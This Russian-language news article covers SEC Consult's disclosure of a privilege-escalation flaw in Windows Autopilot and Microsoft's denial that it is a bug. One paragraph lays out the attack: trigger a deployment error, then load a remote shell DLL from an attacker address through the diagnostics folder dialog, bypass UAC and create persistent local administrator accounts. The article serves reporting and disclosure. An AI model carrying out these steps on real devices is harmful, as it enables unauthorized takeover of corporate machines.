В Windows нашли «дыру» для захвата ПК
Эксперты SEC Consult описали возможность создания бэкдоров с помощью инструмента Microsoft для развертывания новых устройств в корпоративной сети. В Microsoft утверждают, что проблемы не существует.
Бэкдоры на автопилоте
Австрийская компания SEC Consult сообщила об обнаружении уязвимости, допускающей повышение привилегий, в Microsoft Autopilot, инструменте для развертывания устройств в корпоративных сетях. В Microsoft пока заявляют, что багом выявленная проблема не является. В SEC Consult с этим не согласились и опубликовали технические подробности.
Windows Autopilot — это совокупность технологий, используемых для настройки и предварительной конфигурации новых устройств в корпоративной сети с установкой OEM-оптимизированной версии Windows 10, которая затем может быть преобразована в другие варианты ОС — «профессиональную» или «корпоративную». Autopilot также применяется для снятия устройств с учета, сброса настроек, переназначения или восстановления устройств.
Эксперты SEC Consult обнаружили критический, по их мнению, изъян, затрагивающий процесс развертывания Autopilot, который позволяет злоумышленнику или обычному пользователю повышать свои привилегии до уровня локального администратора.
Это возможно даже если в профиле развертывания Autopilot специально указано, что новые пользователи могут добавляться только в группу обычных непривилегированных юзеров, что добавление новых локальных администраторов запрещено и что запуск CMD через Shift+F10 в интерфейсе OOBE запрещен однозначно.
Проблема присутствует минимум в двух сценариях Windows Autopilot — User-Driven (управляемый пользователем) и pre-provisioning (предварительно подготовленное развертывание).
Не исключено, что проблема может эксплуатироваться и в других сценариях.
Создать ошибку
Эксплуатация уязвимости предполагает искусственный вызов ошибки на устройстве, на которое накатывается ПО с помощью WindowsAutopilot: либо посредством отключения от локальной сети, либо с помощью деактивации устройства безопасности TPM. Ошибка также возникнет, если версия TPM ниже 2.0.
При открытии окна с сообщением об ошибке потребуется кликнуть на кнопку ViewDiagnostics (просмотр диагностики), затем в диалоге «выбор папки» нужно ввести Rundll32.exe\\10.0.0.1\shell.dll,DLLMain. Этим устанавливается соединение шелла с хостом атакующего в качестве пользователя по умолчанию — defaultuser0. У этого юзера — администраторские полномочия.
Поскольку система UAC активна, потребуется инструмент его обхода - эксперты SECConsult применили StoreFileSys. В итоге злоумышленник получает возможность создать локального пользователя с администраторскими полномочиями или другие бэкдоры. Дальше остается только присоединить устройство обратно к локальной сети или снова активировать TPM.
Накатывание ПО возобновляется и проходит успешно от начала и до конца. Пользователь defaultuser0 устраняется, однако созданные им локальные пользователи с административными полномочиями сохраняются.
Естественно, эксперты SECConsult немедленно проинформировали о проблеме Microsoft через сервис msrc.microsoft.com, приложив к сообщению тестовый эксплойт. Однако разработчик Windows сперва проигнорировал сообщение, а затем заявил, что проблема отсутствует и что угрозы безопасности не выявлено. После этого в SECConsult решили опубликовать технические сведения об уязвимости.
«Речь, вероятнее всего, об ошибке: игнорировать такую уязвимость и, тем более, рассматривать ее как “нормальное поведение”, как минимум, недальновидно, — полагает Михаил Зайцев, эксперт по информационной безопасности компании SEC Consult Services, российского дочернего предприятия SEC Consult. — Угроза выглядит достаточно серьезной, так что после публикации сведений о ней Microsoft, скорее всего, придется с большим вниманием подойти к вопросу».